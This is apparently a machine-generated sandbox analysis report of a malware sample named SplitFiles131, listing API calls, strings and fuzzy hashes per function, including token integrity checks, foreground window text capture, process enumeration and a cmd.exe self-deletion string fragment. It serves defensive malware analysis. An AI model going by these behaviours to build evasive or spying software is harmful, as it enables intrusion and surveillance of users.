                                          • Opcode Fuzzy Hash: cdf5ef2873a73ee89aeb392416d28c2a8e100c1643c37962a50c484033c6f312
                                          • Instruction Fuzzy Hash: 76A15D32B001649FCF19EF68EC51BAE3BA1AB46314F54015EF811EB392CB39D942CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 00406603
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0040660A
                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 00406623
                                          • CloseHandle.KERNEL32(?), ref: 00406630
                                          • CloseHandle.KERNEL32(?), ref: 00406646
                                          • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00406666
                                          • EqualSid.ADVAPI32(?,?), ref: 00406677
                                          • FreeSid.ADVAPI32(?), ref: 00406682
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleProcessToken$AllocateCurrentEqualFreeInformationInitializeOpen
                                          • String ID:
                                          • API String ID: 1013447061-0
                                          • Opcode ID: 8e728c0aa3363026ab09ef20ff487f076741c97f8360c68268a6665fe9e221c8
                                          • Instruction ID: 578e346a92eed40973933b436f29d829d3a9d7cfed80168a2ded3e3812858e1e
                                          • Opcode Fuzzy Hash: 8e728c0aa3363026ab09ef20ff487f076741c97f8360c68268a6665fe9e221c8
                                          • Instruction Fuzzy Hash: 3E111F31B0021CABDB20DFE1DD49BAEB7B9FF08701F400479E906EA190DAB599169B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00405F40: __Init_thread_footer.LIBCMT ref: 00405FE0
                                            • Part of subcall function 00405F40: __Init_thread_footer.LIBCMT ref: 004060D6
                                          • Sleep.KERNEL32(?,DCBD048B), ref: 00408D5F
                                            • Part of subcall function 00405F40: __Init_thread_footer.LIBCMT ref: 004061D5
                                            • Part of subcall function 00405F40: GetForegroundWindow.USER32 ref: 00406276
                                            • Part of subcall function 00405F40: GetWindowTextA.USER32 ref: 00406291
                                          • Sleep.KERNEL32(?,00000000,00000000,?,?,?,?,00439B30,DCBD048B), ref: 00408F14
                                          • Sleep.KERNEL32(00000004,00000000,?,?,?,?,00439B30,DCBD048B), ref: 00408F24
                                          • Sleep.KERNEL32(00000BB8,00000000,00439B34,?,?,?,?,?,?,?,?,00439B30,DCBD048B), ref: 00408FE8
                                          • Sleep.KERNEL32(000007D0), ref: 004091C7
                                            • Part of subcall function 00403770: CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,DCBD048B), ref: 004037F0
                                            • Part of subcall function 00403770: CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403814
                                            • Part of subcall function 00403770: _mbstowcs.LIBCMT ref: 00403867
                                            • Part of subcall function 00403770: CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 0040387E
                                            • Part of subcall function 00403770: GetLastError.KERNEL32 ref: 00403888
                                          • Sleep.KERNEL32(000007D0), ref: 004091D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$CryptInit_thread_footer$HashWindow$AcquireContextCreateDataErrorForegroundLastText_mbstowcs
                                          • String ID: )<
                                          • API String ID: 1673536643-2400745456
                                          • Opcode ID: 23d203c44105ae4b2082f425863ddf676ccaa81f6680862cae038eba0604537e
                                          • Instruction ID: 70604cc1ca8e53ac9b92178323d8b5bc0271906fc0c0c9cf9f081b3e31f09ae7
                                          • Opcode Fuzzy Hash: 23d203c44105ae4b2082f425863ddf676ccaa81f6680862cae038eba0604537e
                                          • Instruction Fuzzy Hash: C6C1C1B09001588ADB18F775CD997EE72689F5030CF4401BEE90AB72D2EE7C5E49CA6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00418873: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0040953A,00000000), ref: 00418886
                                            • Part of subcall function 00418873: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004188B7
                                          • CreateThread.KERNEL32 ref: 004095FE
                                          • Sleep.KERNEL32(00000BB8), ref: 00409609
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$CreateFileSleepSystemThreadUnothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: /chk$SUB=$start$test
                                          • API String ID: 4044491330-2206718722
                                          • Opcode ID: 0b7e1866d143fc2a1f884dde0244745e592096d5921bc9574330ee586fdfa3a8
                                          • Instruction ID: f08724c49b25eef3d87a27f8e4f7b5a7e04b5c5297436c6f3479f7f723656a48
                                          • Opcode Fuzzy Hash: 0b7e1866d143fc2a1f884dde0244745e592096d5921bc9574330ee586fdfa3a8
                                          • Instruction Fuzzy Hash: 7C413D31A00104AACF11AB76CC127BEBBA19B15308F54447BE945B72C3EB7DDE46C69D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcessId.KERNEL32(DCBD048B), ref: 004054EC
                                            • Part of subcall function 00405420: OpenProcess.KERNEL32(00000410,00000000,?,00450D41,00000000), ref: 0040544B
                                            • Part of subcall function 00405420: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,00450D41,00000000), ref: 00405466
                                            • Part of subcall function 00405420: FindCloseChangeNotification.KERNEL32(00000000,?,00450D41,00000000), ref: 0040546D
                                          • GetCurrentProcessId.KERNEL32 ref: 00405508
                                            • Part of subcall function 00405250: OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 004052B0
                                            • Part of subcall function 00405250: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?,?), ref: 004052CD
                                            • Part of subcall function 00405250: K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104,?,?,?,?), ref: 004052EA
                                            • Part of subcall function 00405250: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?), ref: 004052F1
                                          • ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,00000000,00000000,00000000), ref: 004055A4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$ChangeCloseCurrentFindModuleNameNotificationOpen$BaseEnumExecuteFileModulesShell
                                          • String ID: " & exit$" /f & erase "$C:\Windows\System32\cmd.exe
                                          • API String ID: 3061982424-3347335610
                                          • Opcode ID: 6bc7b3ffeecbd7e61c6a60580daaf1c04a1e8b1486a71f75cba929ab9ffd069e
                                          • Instruction ID: bb57c133ade53ec488d370c8a58f02c66d8e32e9da8c978da3b10ee8368ab8b3
                                          • Opcode Fuzzy Hash: 6bc7b3ffeecbd7e61c6a60580daaf1c04a1e8b1486a71f75cba929ab9ffd069e
                                          • Instruction Fuzzy Hash: 35219030A00248DBC704FB75CC46BDDBBB4AB14708F50417AA506B71D2EFB82A49CB5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 004052B0
                                          • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?,?), ref: 004052CD
                                          • K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104,?,?,?,?), ref: 004052EA
                                          • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?), ref: 004052F1
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$BaseChangeCloseEnumFindModuleModulesNameNotificationOpen
                                          • String ID:
                                          • API String ID: 1316604328-0
                                          • Opcode ID: c0d1d87ece03490290b5015221e901385bd44465a3c604b87790a323a267429d
                                          • Instruction ID: 317e0fa30e6df0fc2493c0f556c76fdcfe70c6514a20a7537da84c3b601fc5e8
                                          • Opcode Fuzzy Hash: c0d1d87ece03490290b5015221e901385bd44465a3c604b87790a323a267429d
                                          • Instruction Fuzzy Hash: 7121C471A005199BD725DF65DC05BEAB7B8EF09300F0002FAEA49A7280DBF45AC5CF98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 004207BB: GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 00420803
                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,0000000C,00000000,00000000,?,?,?,00000000,?,?,?,00000000), ref: 0042116E
                                          • GetLastError.KERNEL32(?,?,?,00000000,?,?,?,00000000), ref: 00421178
                                          • __dosmaperr.LIBCMT ref: 004211B7
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
                                          • String ID:
                                          • API String ID: 910155933-0
                                          • Opcode ID: e24a92b2f476dda8a345309e2f2059689fa752e10403ff131c579cb01226544e
                                          • Instruction ID: 3c7e185e40fd80dbdae143d1bdd6e74d6c83d27f732932d537b6873211927bf6
                                          • Opcode Fuzzy Hash: e24a92b2f476dda8a345309e2f2059689fa752e10403ff131c579cb01226544e
                                          • Instruction Fuzzy Hash: 4F513671F00269ABDB209FA9D805FEF7BB5AF59314F54004BE500A7262C77CDA82C769
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 00424B99
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00424C07
                                            • Part of subcall function 00420094: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,004213AE,?,00000000,00000000), ref: 00420140
                                            • Part of subcall function 0041ED2F: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041ED61
                                          • _free.LIBCMT ref: 00424BF8
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                          • String ID:
                                          • API String ID: 2560199156-0
                                          • Opcode ID: a99ed16166c4cb6fd5d58302230d1ee3cac86f8bd5c28f31c17afe00db9e4936
                                          • Instruction ID: 8e17b8cbccb8b4fc6403cf286aecc81c96b356ed4abcbad2db771e8ab638680e
                                          • Opcode Fuzzy Hash: a99ed16166c4cb6fd5d58302230d1ee3cac86f8bd5c28f31c17afe00db9e4936
                                          • Instruction Fuzzy Hash: 1101FC727012357B2331167B3C89E7F6D5DCDC2B94396012AFE04D6201EDA8DC0281BC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindCloseChangeNotification.KERNEL32(00000000,00000000,00012000,?,0041EBC1,00012000,0043BDF8,0000000C,0041EC73,0043DAA0), ref: 0041ECE9
                                          • GetLastError.KERNEL32(?,0041EBC1,00012000,0043BDF8,0000000C,0041EC73,0043DAA0), ref: 0041ECF3
                                          • __dosmaperr.LIBCMT ref: 0041ED1E
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                          • String ID:
                                          • API String ID: 490808831-0
                                          • Opcode ID: d60001a35fcf9b4c3d1a3c2dde78454ab33b26a104938e4cfaa07c3bd8a184cd
                                          • Instruction ID: 2ccc4e0a667c62fdb768d4e4b7cf41dbe42b991734cf967249ceca80e9307b57
                                          • Opcode Fuzzy Hash: d60001a35fcf9b4c3d1a3c2dde78454ab33b26a104938e4cfaa07c3bd8a184cd
                                          • Instruction Fuzzy Hash: E001E93A70152056D5342237BC497EE67468B82738F29055BFC06873C6EA7DCCC252DD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,?,00450D41,00000000), ref: 0040544B
                                          • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,00450D41,00000000), ref: 00405466
                                          • FindCloseChangeNotification.KERNEL32(00000000,?,00450D41,00000000), ref: 0040546D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ChangeCloseFileFindModuleNameNotificationOpenProcess
                                          • String ID:
                                          • API String ID: 4186666201-0
                                          • Opcode ID: 1393ca63317ed933dd5bffd107fb2ff396153b6cb66a741b0b6755bcac672aa0
                                          • Instruction ID: 922376feaebcf12d809977a557db1708a013f2b36cdaadcafb515ec78757bc9b
                                          • Opcode Fuzzy Hash: 1393ca63317ed933dd5bffd107fb2ff396153b6cb66a741b0b6755bcac672aa0
                                          • Instruction Fuzzy Hash: 741104306002189BD720DF25DC05BFBBBB4DB45700F0002AEE58597280DBF95A868FD8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00406708
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: D
                                          • API String ID: 963392458-2746444292
                                          • Opcode ID: ee5791995512ebe7736d57afe2c1496ebed76edc28558b6e22b2e9b0c1df2158
                                          • Instruction ID: 50eb80fa6753c829cd3f054dc80da8a320b46d7d2baa1acb39a29d7f976f20fa
                                          • Opcode Fuzzy Hash: ee5791995512ebe7736d57afe2c1496ebed76edc28558b6e22b2e9b0c1df2158
                                          • Instruction Fuzzy Hash: 7D21B031E1034CA7DB14DFA5CE457ADB3B2EB89704F209319F9157A184EB74AA808B88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 526f0598ed6c5c09f80c27bed797f3bdec909cf5737d209df5188b07db91258f
                                          • Instruction ID: 569bb8f4cb614d0ae093e3d0afb7296beb312a053887baa6913238e5c0853e05
                                          • Opcode Fuzzy Hash: 526f0598ed6c5c09f80c27bed797f3bdec909cf5737d209df5188b07db91258f
                                          • Instruction Fuzzy Hash: F8E06C3650351145A615367B7C017F716898BD1379F69032BF854862D1DA7C88D240AF
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 59e20a6d73741625aa60e7257ae5aeb68c6bd765af771a165dc67992aa078022
                                          • Instruction ID: 80c14f1a6abcca7d923a46e9f34a6542aaf5e04ef8ab335fbec2492ac4023ecb
                                          • Opcode Fuzzy Hash: 59e20a6d73741625aa60e7257ae5aeb68c6bd765af771a165dc67992aa078022
                                          • Instruction Fuzzy Hash: 22318076A016109F8B14CFADC58099EF7F2FF8932072581A6D615EB360C334AD55CF96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentHwProfileA.ADVAPI32(?), ref: 00406786
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentProfile
                                          • String ID:
                                          • API String ID: 2104809126-0
                                          • Opcode ID: 4866f708c36be3b8c5458998122e6fbc1a421f3c5607ad6291c9d3a1b93d6214
                                          • Instruction ID: aa22e25d1b11b59e7382e39be16936437f2c1d5e4af8da413c1625e3f1392632
                                          • Opcode Fuzzy Hash: 4866f708c36be3b8c5458998122e6fbc1a421f3c5607ad6291c9d3a1b93d6214
                                          • Instruction Fuzzy Hash: BA11A9307002189BDB24EF65D8557BEB7B9EF09308F0005AEE84697781DF795A098BD5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          • Opcode ID: d4cc4cf86e9e065f416ef9d63789a222c11f165fcbbbb45fb3f736e95baad7dc
                                          • Instruction ID: 50b409054a80a02bec94d94242d16b3902a0bf72dd6f6a78c9df47ee9ec44d07
                                          • Opcode Fuzzy Hash: d4cc4cf86e9e065f416ef9d63789a222c11f165fcbbbb45fb3f736e95baad7dc
                                          • Instruction Fuzzy Hash: 39111575A0420AAFCF05DF59E9419DF7BF5EF48314F04406AF809AB351D670EA11CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf1009d72158ea1392668bdfd0f2e791b1cc169ecfef3ac691a9a242aa51b60d
                                          • Instruction ID: 1b8742a41d9530a921bcc596bb1ac412f032a833fb3448dd345c2ad50930357c
                                          • Opcode Fuzzy Hash: bf1009d72158ea1392668bdfd0f2e791b1cc169ecfef3ac691a9a242aa51b60d
                                          • Instruction Fuzzy Hash: B7F0F936D016106AD6312E3B9C067DA36688F4233AF11431BF824921D1DA7CEAC3869D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 521115d978e45e608ea96acc4bbcbcaa1d0163517ca36d6091db2ee742d9455d
                                          • Instruction ID: 460fcbff9e95d3aa1796ce0ff75d521f962e5269c53dc2fc002039b783f7abde
                                          • Opcode Fuzzy Hash: 521115d978e45e608ea96acc4bbcbcaa1d0163517ca36d6091db2ee742d9455d
                                          • Instruction Fuzzy Hash: EC018472D0116DBFCF01AFA89C019DE7FB5BF08304F54016AFD14E2191E6358A60DB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041ED61
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 5231c26b2e5400a8b445dea9dc5c14e3c1ee74f90dcd341e6a6c6bc4848ff768
                                          • Instruction ID: 959c84357b1a9f0ee529832ae90eed3ec28ec96ce801b17d18c686e8694df61b
                                          • Opcode Fuzzy Hash: 5231c26b2e5400a8b445dea9dc5c14e3c1ee74f90dcd341e6a6c6bc4848ff768
                                          • Instruction Fuzzy Hash: 95E06539141222A7E6313767BD01BDB76599F467A4F150123FC45962A1CA5CCCC185AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,10003243,?,?,100024B8,0007A120), ref: 1000876D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 9bc71e6e4ec6e68a8c2aed3646502ff683cefb7352d8620f7e826d587402586a
                                          • Instruction ID: 67f11896f8f7d2121f3f4df057540a061ed8fd880985c25efa2fb590a71935ec
                                          • Opcode Fuzzy Hash: 9bc71e6e4ec6e68a8c2aed3646502ff683cefb7352d8620f7e826d587402586a
                                          • Instruction Fuzzy Hash: 82E0E53524D6216AF751D6618C4474A3A88FB413F0F324120FE8C9208CDE64DE0083E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateFileW.KERNEL32(00000000,00000000,?,00428767,?,?,00000000,?,00428767,00000000,0000000C), ref: 00428394
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: b718aefa274249b92c0224c2ff73fbbbd694e56a9348850d4764fd55e00e249d
                                          • Instruction ID: 6a3501348c7adacfcd1c424c20773ecf10769bdff7a35cf21c7a2e113d4d802e
                                          • Opcode Fuzzy Hash: b718aefa274249b92c0224c2ff73fbbbd694e56a9348850d4764fd55e00e249d
                                          • Instruction Fuzzy Hash: 19D06C3210014DFBDF128F85DC06EDA3BAAFB48714F014010BA1856060C772E822AB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 100069C3
                                            • Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
                                            • Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: ErrorFreeHeapLast_free
                                          • String ID:
                                          • API String ID: 1353095263-0
                                          • Opcode ID: 4a8faf65200c92b95d684da80c623e720def96cf622f0f76f7dc9a0cc9b61c85
                                          • Instruction ID: c6a98ba0e5363ae005110d363abbfc5d7111903c5cce904da764f3f1e972a342
                                          • Opcode Fuzzy Hash: 4a8faf65200c92b95d684da80c623e720def96cf622f0f76f7dc9a0cc9b61c85
                                          • Instruction Fuzzy Hash: 8CC08C31000208FBDB00CB41C846A4E7BA8EB803A4F300044F40417240CAB2FF009A90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402E9F
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 213a422f90c8c6353df42cf4beb6bca1ece7b85540c8c8c994e7d48a5d8c3a30
                                          • Instruction ID: b31a385f3b57fd4fd7166e142863b1bbbb6af29b0bf7193fe4047b5eb220286a
                                          • Opcode Fuzzy Hash: 213a422f90c8c6353df42cf4beb6bca1ece7b85540c8c8c994e7d48a5d8c3a30
                                          • Instruction Fuzzy Hash: CAC0483200020DFBCF025F82EC048DA3F2AFB08261B408024FA1C04030C7739972ABAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualFree.KERNELBASE(?,?,?), ref: 00402EBC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
